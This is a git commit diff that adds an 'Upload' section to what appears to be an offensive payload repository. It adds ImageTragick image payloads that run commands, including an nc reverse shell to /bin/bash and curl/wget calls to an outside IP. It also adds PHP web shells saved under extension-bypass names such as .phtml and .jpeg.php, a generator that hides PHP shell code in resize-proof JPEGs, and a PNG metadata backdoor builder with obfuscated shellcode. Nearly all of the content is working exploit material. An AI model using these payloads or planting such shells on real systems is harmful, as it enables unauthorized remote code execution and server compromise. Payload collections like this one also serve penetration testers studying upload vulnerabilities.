Upload payloads
@ -6,7 +6,6 @@ TODO:
|
||||
* Upload
|
||||
* Traversal Directory
|
||||
* Tar
|
||||
* SSRF
|
||||
* PHP Serialization
|
||||
* CSV Injection
|
||||
|
||||
@ -14,5 +13,6 @@ To improve:
|
||||
* RCE
|
||||
* SQL injection
|
||||
* XXE
|
||||
* SSRF
|
||||
|
||||
# /!\ Work in Progress : 1%
|
||||
|
4
Upload/Image Tragik/detection_port_localhost_http.jpg
Executable file
@ -0,0 +1,4 @@
|
||||
push graphic-context
|
||||
viewbox 0 0 640 480
|
||||
fill 'url(http://localhost:PORT/)'
|
||||
pop graphic-context
|
9
Upload/Image Tragik/image_magik_reverse_shell.xml
Executable file
@ -0,0 +1,9 @@
|
||||
<?xml version="1.0" standalone="no"?>
|
||||
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
|
||||
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
|
||||
<svg width="640px" height="480px" version="1.1"
|
||||
xmlns="http://www.w3.org/2000/svg" xmlns:xlink=
|
||||
"http://www.w3.org/1999/xlink">
|
||||
<image xlink:href="https://example.com/image.jpg"|/bin/nc.traditional 127.0.0.1 4242 -e /bin/bash""
|
||||
x="0" y="0" height="640px" width="480px"/>
|
||||
</svg>
|
After Width: | Height: | Size: 424 B |
4
Upload/Image Tragik/payload-http-log.png
Executable file
@ -0,0 +1,4 @@
|
||||
push graphic-context
|
||||
viewbox 0 0 640 480
|
||||
fill 'url(https://pre09.example.net/15bd/th/pre/f/2012/237/c/7/all_work_and_no_something/someting_by_nebezial-d5cdlor.jpg";curl "92.222.81.2)'
|
||||
pop graphic-context
|
4
Upload/Image Tragik/payload_rce_touch.jpg
Executable file
@ -0,0 +1,4 @@
|
||||
push graphic-context
|
||||
viewbox 0 0 640 480
|
||||
fill 'url(https://127.0.0.0/oops.jpg"|touch "rce1)'
|
||||
pop graphic-context
|
4
Upload/Image Tragik/payload_rce_wget.gif
Executable file
@ -0,0 +1,4 @@
|
||||
push graphic-context
|
||||
viewbox 0 0 640 480
|
||||
image over 0,0 0,0 'https://127.0.0.1/x.php?x=`wget -O- 92.222.81.2:1337 > /dev/null`'
|
||||
pop graphic-context
|
5
Upload/JPG Resize/README.txt
Executable file
@ -0,0 +1,5 @@
|
||||
# How to use
|
||||
b.php?c=ls
|
||||
|
||||
|
||||
Source: http://www.virtualabs.fr/Nasty-bulletproof-Jpegs-l
|
128
Upload/JPG Resize/bulletjpg.py
Executable file
@ -0,0 +1,128 @@
|
||||
#!/usr/bin/python
|
||||
|
||||
"""
|
||||
|
||||
Bulletproof Jpegs Generator
|
||||
Copyright (C) 2012 Damien "virtualabs" Cauquil
|
||||
|
||||
This program is free software; you can redistribute it and/or modify
|
||||
it under the terms of the GNU General Public License as published by
|
||||
the Free Software Foundation; either version 2 of the License, or
|
||||
(at your option) any later version.
|
||||
|
||||
This program is distributed in the hope that it will be useful,
|
||||
but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
GNU General Public License for more details.
|
||||
|
||||
You should have received a copy of the GNU General Public License along
|
||||
with this program; if not, write to the Free Software Foundation, Inc.,
|
||||
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
|
||||
|
||||
"""
|
||||
|
||||
import struct,sys,os
|
||||
import gd
|
||||
from StringIO import StringIO
|
||||
from random import randint,shuffle
|
||||
from time import time
|
||||
|
||||
# image width/height (square)
|
||||
N = 32
|
||||
|
||||
|
||||
def insertPayload(_in, _out, payload,off):
|
||||
"""
|
||||
Payload insertion (quick JPEG parsing and patching)
|
||||
"""
|
||||
img = _in
|
||||
# look for 'FF DA' (SOS)
|
||||
sos = img.index("\xFF\xDA")
|
||||
sos_size = struct.unpack('>H',img[sos+2:sos+4])[0]
|
||||
sod = sos_size+2
|
||||
# look for 'FF D9' (EOI)
|
||||
eoi = img[sod:].index("\xFF\xD9")
|
||||
# enough size ?
|
||||
if (eoi - sod - off)>=len(payload):
|
||||
_out.write(img[:sod+sos+off]+payload+img[sod+sos+len(payload)+off:])
|
||||
return True
|
||||
else:
|
||||
return False
|
||||
|
||||
if __name__=='__main__':
|
||||
|
||||
print "[+] Virtualabs' Nasty bulletproof Jpeg generator"
|
||||
print " | website: http://virtualabs.fr"
|
||||
print " | contact: virtualabs -at- gmail -dot- com"
|
||||
print ""
|
||||
|
||||
payloads = ["<?php system(/**/$_GET['c'/**/]); ?>","<?php /**/system($_GET[chr(99)/**/]); ?>","<?php system(/**/$_GET[chr(99)]); ?>","<?php\r\nsystem($_GET[/**/'c']);\r\n ?>"]
|
||||
|
||||
# make sure the exploit-jpg directory exists or create it
|
||||
if os.path.exists('exploit-jpg') and not os.path.isdir('exploit-jpg'):
|
||||
print "[!] Please remove the file named 'exploit-jpg' from the current directory"
|
||||
elif not os.path.exists('exploit-jpg'):
|
||||
os.mkdir('exploit-jpg')
|
||||
|
||||
# start generation
|
||||
print '[i] Generating ...'
|
||||
for q in range(50,100)+[-1]:
|
||||
# loop over every payload
|
||||
for p in payloads:
|
||||
# not done yet
|
||||
done = False
|
||||
start = time()
|
||||
# loop while not done and timeout not reached
|
||||
while not done and (time()-start)<10.0:
|
||||
|
||||
# we create a NxN pixels image, true colors
|
||||
img = gd.image((N,N),True)
|
||||
# we create a palette
|
||||
pal = []
|
||||
for i in range(N*N):
|
||||
pal.append(img.colorAllocate((randint(0,256),randint(0,256),randint(0,256))))
|
||||
# we shuffle this palette
|
||||
shuffle(pal)
|
||||
# and fill the image with it
|
||||
pidx = 0
|
||||
for x in range(N):
|
||||
for y in range(N):
|
||||
img.setPixel((x,y),pal[pidx])
|
||||
pidx+=1
|
||||
|
||||
# write down the image
|
||||
out_jpg = StringIO('')
|
||||
img.writeJpeg(out_jpg,q)
|
||||
out_raw = out_jpg.getvalue()
|
||||
|
||||
# now, we try to insert the payload various ways
|
||||
for i in range(64):
|
||||
test_jpg = StringIO('')
|
||||
if insertPayload(out_raw,test_jpg,p,i):
|
||||
try:
|
||||
# write down the new jpeg file
|
||||
f = open('exploit-jpg/exploit-%d.jpg'%q,'wb')
|
||||
f.write(test_jpg.getvalue())
|
||||
f.close()
|
||||
|
||||
# load it with GD
|
||||
test = gd.image('exploit-jpg/exploit-%d.jpg'%q)
|
||||
final_jpg = StringIO('')
|
||||
test.writeJpeg(final_jpg,q)
|
||||
final_raw = final_jpg.getvalue()
|
||||
# does it contain our payload ?
|
||||
if p in final_raw:
|
||||
# Yay !
|
||||
print '[i] Jpeg quality %d ... DONE'%q
|
||||
done = True
|
||||
break
|
||||
except IOError,e:
|
||||
pass
|
||||
else:
|
||||
break
|
||||
if not done:
|
||||
# payload not found, we remove the file
|
||||
os.unlink('exploit-jpg/exploit-%d.jpg'%q)
|
||||
else:
|
||||
break
|
||||
|
BIN
Upload/JPG Resize/exploit--1.jpg
Executable file
After Width: | Height: | Size: 1.3 KiB |
BIN
Upload/JPG Resize/exploit-52.jpg
Executable file
After Width: | Height: | Size: 1.1 KiB |
BIN
Upload/JPG Resize/exploit-53.jpg
Executable file
After Width: | Height: | Size: 1.1 KiB |
BIN
Upload/JPG Resize/exploit-54.jpg
Executable file
After Width: | Height: | Size: 1.1 KiB |
BIN
Upload/JPG Resize/exploit-55.jpg
Executable file
After Width: | Height: | Size: 1.1 KiB |
BIN
Upload/JPG Resize/exploit-56.jpg
Executable file
After Width: | Height: | Size: 1.1 KiB |
BIN
Upload/JPG Resize/exploit-57.jpg
Executable file
After Width: | Height: | Size: 1.1 KiB |
BIN
Upload/JPG Resize/exploit-58.jpg
Executable file
After Width: | Height: | Size: 1.1 KiB |
BIN
Upload/JPG Resize/exploit-59.jpg
Executable file
After Width: | Height: | Size: 1.1 KiB |
BIN
Upload/JPG Resize/exploit-60.jpg
Executable file
After Width: | Height: | Size: 1.1 KiB |
BIN
Upload/JPG Resize/exploit-61.jpg
Executable file
After Width: | Height: | Size: 1.1 KiB |
BIN
Upload/JPG Resize/exploit-62.jpg
Executable file
After Width: | Height: | Size: 1.2 KiB |
BIN
Upload/JPG Resize/exploit-63.jpg
Executable file
After Width: | Height: | Size: 1.2 KiB |
BIN
Upload/JPG Resize/exploit-64.jpg
Executable file
After Width: | Height: | Size: 1.2 KiB |
BIN
Upload/JPG Resize/exploit-65.jpg
Executable file
After Width: | Height: | Size: 1.2 KiB |
BIN
Upload/JPG Resize/exploit-66.jpg
Executable file
After Width: | Height: | Size: 1.2 KiB |
BIN
Upload/JPG Resize/exploit-67.jpg
Executable file
After Width: | Height: | Size: 1.2 KiB |
BIN
Upload/JPG Resize/exploit-68.jpg
Executable file
After Width: | Height: | Size: 1.2 KiB |
BIN
Upload/JPG Resize/exploit-69.jpg
Executable file
After Width: | Height: | Size: 1.2 KiB |
BIN
Upload/JPG Resize/exploit-70.jpg
Executable file
After Width: | Height: | Size: 1.2 KiB |
BIN
Upload/JPG Resize/exploit-71.jpg
Executable file
After Width: | Height: | Size: 1.2 KiB |
BIN
Upload/JPG Resize/exploit-72.jpg
Executable file
After Width: | Height: | Size: 1.2 KiB |
BIN
Upload/JPG Resize/exploit-73.jpg
Executable file
After Width: | Height: | Size: 1.3 KiB |
BIN
Upload/JPG Resize/exploit-74.jpg
Executable file
After Width: | Height: | Size: 1.3 KiB |
BIN
Upload/JPG Resize/exploit-75.jpg
Executable file
After Width: | Height: | Size: 1.3 KiB |
BIN
Upload/JPG Resize/exploit-76.jpg
Executable file
After Width: | Height: | Size: 1.3 KiB |
BIN
Upload/JPG Resize/exploit-77.jpg
Executable file
After Width: | Height: | Size: 1.3 KiB |
BIN
Upload/JPG Resize/exploit-78.jpg
Executable file
After Width: | Height: | Size: 1.3 KiB |
BIN
Upload/JPG Resize/exploit-79.jpg
Executable file
After Width: | Height: | Size: 1.3 KiB |
BIN
Upload/JPG Resize/exploit-80.jpg
Executable file
After Width: | Height: | Size: 1.3 KiB |
BIN
Upload/JPG Resize/exploit-81.jpg
Executable file
After Width: | Height: | Size: 1.4 KiB |
BIN
Upload/JPG Resize/exploit-82.jpg
Executable file
After Width: | Height: | Size: 1.4 KiB |
BIN
Upload/JPG Resize/exploit-83.jpg
Executable file
After Width: | Height: | Size: 1.4 KiB |
BIN
Upload/JPG Resize/exploit-84.jpg
Executable file
After Width: | Height: | Size: 1.4 KiB |
BIN
Upload/JPG Resize/exploit-85.jpg
Executable file
After Width: | Height: | Size: 1.4 KiB |
BIN
Upload/JPG Resize/exploit-86.jpg
Executable file
After Width: | Height: | Size: 1.4 KiB |
BIN
Upload/JPG Resize/exploit-87.jpg
Executable file
After Width: | Height: | Size: 1.5 KiB |
BIN
Upload/JPG Resize/exploit-88.jpg
Executable file
After Width: | Height: | Size: 1.5 KiB |
BIN
Upload/JPG Resize/exploit-89.jpg
Executable file
After Width: | Height: | Size: 1.5 KiB |
BIN
Upload/JPG Resize/exploit-90.jpg
Executable file
After Width: | Height: | Size: 1.6 KiB |
BIN
Upload/JPG Resize/exploit-91.jpg
Executable file
After Width: | Height: | Size: 1.6 KiB |
BIN
Upload/JPG Resize/exploit-92.jpg
Executable file
After Width: | Height: | Size: 1.6 KiB |
BIN
Upload/JPG Resize/exploit-93.jpg
Executable file
After Width: | Height: | Size: 1.7 KiB |
BIN
Upload/JPG Resize/exploit-94.jpg
Executable file
After Width: | Height: | Size: 1.8 KiB |
BIN
Upload/JPG Resize/exploit-95.jpg
Executable file
After Width: | Height: | Size: 1.9 KiB |
BIN
Upload/JPG Resize/exploit-96.jpg
Executable file
After Width: | Height: | Size: 1.9 KiB |
BIN
Upload/JPG Resize/exploit-97.jpg
Executable file
After Width: | Height: | Size: 2.1 KiB |
BIN
Upload/JPG Resize/exploit-98.jpg
Executable file
After Width: | Height: | Size: 2.2 KiB |
BIN
Upload/Metadata GIF/shell_cinema.gif
Executable file
After Width: | Height: | Size: 994 KiB |
BIN
Upload/Metadata GIF/shell_fr.gif
Executable file
After Width: | Height: | Size: 407 B |
BIN
Upload/Metadata GIF/shell_problem.gif
Executable file
After Width: | Height: | Size: 560 KiB |
30
Upload/Metadata PNG/Build_image_to_LFI.py
Executable file
@ -0,0 +1,30 @@
|
||||
from PIL import Image
|
||||
|
||||
# Shellcodes - Bypass included : Keyword Recognition : System, GET, php
|
||||
# --- How to use : http://localhost/shell.php?c=echo%20'<pre>';ls
|
||||
|
||||
#shellcode = "<?=@`$_GET[c]`;"
|
||||
shellcode = "<?php system($_GET['c']); ?>"
|
||||
# --- How to use : http://localhost/shell.php?_=system&__=echo%20'<pre>';ls
|
||||
shellcode2 = "<?='Sh3ll'; $_='{';$_=($_^'<').($_^'>;').($_^'/');?><?=${'_'.$_}['_'](${'_'.$_}['__']);?>"
|
||||
|
||||
|
||||
print "\n[+] Advanced Upload - Shell inside metadatas of a PNG file"
|
||||
|
||||
# Create a backdoored PNG
|
||||
print " - Creating a payload.png"
|
||||
im = Image.new("RGB", (10,10), "Black")
|
||||
im.info["shell"] = shellcode
|
||||
reserved = ('interlace', 'gamma', 'dpi', 'transparency', 'aspect')
|
||||
|
||||
# undocumented class
|
||||
from PIL import PngImagePlugin
|
||||
meta = PngImagePlugin.PngInfo()
|
||||
|
||||
# copy metadata into new object
|
||||
for k,v in im.info.iteritems():
|
||||
if k in reserved: continue
|
||||
meta.add_text(k, v, 0)
|
||||
im.save("payload.png", "PNG", pnginfo=meta)
|
||||
|
||||
print "Done"
|
BIN
Upload/Metadata PNG/php_exif_data.png
Executable file
After Width: | Height: | Size: 116 B |
1
Upload/PHP Extension/Shell.jpeg.php
Executable file
@ -0,0 +1 @@
|
||||
<?php echo "Shell";system($_GET['cmd']); ?>
|
1
Upload/PHP Extension/Shell.pht
Executable file
@ -0,0 +1 @@
|
||||
<?php echo "Shell";system($_GET['cmd']); ?>
|
1
Upload/PHP Extension/Shell.phtml
Executable file
@ -0,0 +1 @@
|
||||
<?php echo "Shell";system($_GET['cmd']); ?>
|
1
Upload/PHP Extension/Shell.png.php
Executable file
@ -0,0 +1 @@
|
||||
<?php echo "Shell";system($_GET['cmd']); ?>
|
1
Upload/PHP Extension/Shell.shtml
Executable file
@ -0,0 +1 @@
|
||||
<?php echo "Shell";system($_GET['cmd']); ?>
|
BIN
Upload/PHP Extension/shell.pgif
Executable file
After Width: | Height: | Size: 407 B |
BIN
Upload/PNG Resize/110x110_resize_bypass_use_LFI.png
Executable file
After Width: | Height: | Size: 377 B |
BIN
Upload/PNG Resize/32x32_resize_bypass_use_LFI.png
Executable file
After Width: | Height: | Size: 174 B |
@ -1,12 +1,43 @@
|
||||
# Title
|
||||
Lorem
|
||||
|
||||
## Vuln
|
||||
# Upload
|
||||
Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.
|
||||
|
||||
## Exploits
|
||||
Image Tragik
|
||||
```
|
||||
Code
|
||||
HTTP Request
|
||||
Reverse Shell
|
||||
Touch command
|
||||
```
|
||||
|
||||
|
||||
PHP Extension
|
||||
```
|
||||
.php
|
||||
|
||||
Less known extension
|
||||
.pht
|
||||
.pgif
|
||||
.phtml
|
||||
.shtml
|
||||
|
||||
Double extension
|
||||
.jpeg.php
|
||||
.png.php
|
||||
```
|
||||
|
||||
|
||||
PNG Bypass a resize - Upload the picture and use a local file inclusion
|
||||
```
|
||||
You can use it by specifying $_GET[0] as shell_exec and passing a $_POST[1] parameter with the shell command to execute.
|
||||
curl 'http://localhost/b.php?0=shell_exec' --data "1='ls'"
|
||||
curl 'http://localhost/test.php?0=system' --data "1='ls'"
|
||||
```
|
||||
|
||||
|
||||
JPG Bypass a resize - Upload the picture and use a local file inclusion
|
||||
```
|
||||
http://localhost/test.php?c=ls
|
||||
```
|
||||
|
||||
## Thanks to
|
||||
* Lorem
|
||||
* Ipsum
|
||||
* Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil
|